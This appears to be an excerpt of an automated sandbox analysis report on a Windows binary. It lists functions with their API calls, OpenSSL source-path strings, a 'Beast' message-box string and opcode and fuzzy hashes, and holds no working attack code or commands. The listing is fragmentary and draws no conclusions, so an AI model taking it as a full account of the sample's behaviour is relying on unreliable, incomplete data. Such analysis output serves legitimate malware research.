                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ___from_strstr_to_strchr
                                  • String ID: ..\..\openssl-1.1.0f\crypto\x509v3\v3_info.c$value=
                                  • API String ID: 601868998-1818281595
                                  • Opcode ID: 445fa629201a977b5ac9f079288e489c93f17e0740f41e0a0e3d9e6048b50007
                                  • Instruction ID: a07133c35b120a115dfb98ccc24e312334741e7572de69c842010485c57a2e31
                                  • Opcode Fuzzy Hash: 445fa629201a977b5ac9f079288e489c93f17e0740f41e0a0e3d9e6048b50007
                                  • Instruction Fuzzy Hash: 96414FB178070276E6203A659C4BFAF3986AB40B45F450475FE8DB82D3FF95D91483A2
                                  Function 005F22F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114COMMON
                                  Download Yara Rule
                                  APIs
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,005F012B,005F012A,00000000,00000000,00000000,00000000,?,74E84AB0,00000000,005F012B,00000000), ref: 005F2324
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiWide
                                  • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c
                                  • API String ID: 626452242-3997076816
                                  • Opcode ID: 1743970a3ec872788953a5754013742e8f901bfa33d933747d05ca6108160207
                                  • Instruction ID: 181e5c7ef97216b2ee37bb677c3c370d06614594473a235358facb10f2923db1
                                  • Opcode Fuzzy Hash: 1743970a3ec872788953a5754013742e8f901bfa33d933747d05ca6108160207
                                  • Instruction Fuzzy Hash: 423129B17893063AFB606669FC47FBB3B4DE780B59F014126F7089B1C2EA9594414250
                                  Function 00642E80 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___from_strstr_to_strchr.LIBCMT ref: 00642EA1
                                  • ___from_strstr_to_strchr.LIBCMT ref: 00642EE9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ___from_strstr_to_strchr
                                  • String ID: ..\..\openssl-1.1.0f\crypto\x509v3\v3_utl.c
                                  • API String ID: 601868998-3037191162
                                  • Opcode ID: d87d8ba63b2245b54affacab1f6049a869f9346df901b0f23d774330ab347abe
                                  • Instruction ID: 7b16b8f814251b279055ed312416544e004c23844853951295949706f3af4327
                                  • Opcode Fuzzy Hash: d87d8ba63b2245b54affacab1f6049a869f9346df901b0f23d774330ab347abe
                                  • Instruction Fuzzy Hash: 173178A2B4430727D360B7696C56BABB6DAAFC4304FC4013EFD09C7343FA04DA0881A6
                                  Function 006336A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: __vfprintf_l
                                  • String ID: %*s<Not Supported>$%*s<Parse Error>
                                  • API String ID: 86772892-2906783721
                                  • Opcode ID: e7d1418adcdbe83e8c28a165c51479ed4faf2b4d22562fef2b40f58596ded19c
                                  • Instruction ID: d619a858b97b1451070883970e6b660986a55a73109aa892a8df6d24ffeff2c2
                                  • Opcode Fuzzy Hash: e7d1418adcdbe83e8c28a165c51479ed4faf2b4d22562fef2b40f58596ded19c
                                  • Instruction Fuzzy Hash: 740179715083126BDF129E14DD02B5F79A3FB95741FC40C68F150903B2D76AC9589787
                                  Function 005EC110 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                  Download Yara Rule
                                  APIs
                                  • __fread_nolock.LIBCMT ref: 005EC12E
                                  • GetLastError.KERNEL32(..\..\openssl-1.1.0f\crypto\bio\bss_file.c,0000009A), ref: 005EC14E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ErrorLast__fread_nolock
                                  • String ID: ..\..\openssl-1.1.0f\crypto\bio\bss_file.c
                                  • API String ID: 3734711595-2465601336
                                  • Opcode ID: b8b8b3890d879c0b8298e35c6f1a5a85be81eba4d3dda816ad97b66200ad7d78
                                  • Instruction ID: 6e36051b5b7360e94ed057e25e9bfbbbd5d77d945899247a8f7e0d63ab3b2eee
                                  • Opcode Fuzzy Hash: b8b8b3890d879c0b8298e35c6f1a5a85be81eba4d3dda816ad97b66200ad7d78
                                  • Instruction Fuzzy Hash: 2BF0213274830077DA2466BABC07F5B3F857BC5B24F054559F648E51C3EAA0CC42C651
                                  Function 005CC36C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32windowCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 005C5C2D: RtlAllocateHeap.NTDLL(00000008,00010000,005C68A1,?,00000000,006D95B4), ref: 005C5C36
                                  • wvsprintfW.USER32(00000000,?,?), ref: 005CC38B
                                  • MessageBoxW.USER32(00000000,Beast,?), ref: 005CC3AA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: AllocateHeapMessagewvsprintf
                                  • String ID: Beast
                                  • API String ID: 584556068-4068918530
                                  • Opcode ID: f1be4486cb480aa3b3183982f612acc6b0f6ec0b7723d860be557ea85635407d
                                  • Instruction ID: b9576d192db07d4264373b38c15decd5abb77876f4b9a278500d5366ee83a931
                                  • Opcode Fuzzy Hash: f1be4486cb480aa3b3183982f612acc6b0f6ec0b7723d860be557ea85635407d
                                  • Instruction Fuzzy Hash: 45F0A0322006242FC7115AD5AC09F6A3EAEFF81750B004026FA08C7210DA20DD0147A0
                                  Function 006757AA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetOEMCP.KERNEL32(00000000,?,?,00675A33,?), ref: 006757D5
                                  • GetACP.KERNEL32(00000000,?,?,00675A33,?), ref: 006757EC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 3Zg
                                  • API String ID: 0-1257161726
                                  • Opcode ID: a79cafe18c8c5da4917de48007faf731057b10570f23015345c02d484e76ece1
                                  • Instruction ID: ac3178f1b935eb6c5ea0e4b1c6cca79ce535040eca10d2f72d9dd963370d8331
                                  • Opcode Fuzzy Hash: a79cafe18c8c5da4917de48007faf731057b10570f23015345c02d484e76ece1
                                  • Instruction Fuzzy Hash: 09F0AF70801A04EFDB14CB69D88C7A97776AB40336F24478AE43E8B2E1DBB14981CB41